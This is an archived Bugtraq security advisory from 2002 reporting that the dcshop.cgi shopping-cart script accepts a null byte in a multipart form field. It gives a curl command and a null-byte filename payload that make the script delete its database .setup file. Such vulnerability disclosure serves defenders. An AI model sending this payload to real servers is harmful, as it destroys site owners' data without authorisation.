Home page logo
/

bugtraq logo Bugtraq mailing list archives

dcshop.cgi anybody can delete *.setup for database
From: pokleyzz sakamaniaka <pokleyzz () hotmail com>
Date: 25 Mar 2002 09:10:52 -0000



cgi-pl in dcshop beta  (http://www.dcscripts.com) 
allow user to using nullbyte character for variable if 
using multipart/form data type form.
Using curl (http://curl.haxx.se/libcurl/) :

curl -F database= () test txt http://host/cgi-
bin/dcshop.cgi

which test.txt contain databasename.setup[nullbyte]
will couse database.setup file being deleted


  By Date           By Thread  

Current thread:
  • dcshop.cgi anybody can delete *.setup for database pokleyzz sakamaniaka (Mar 25)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]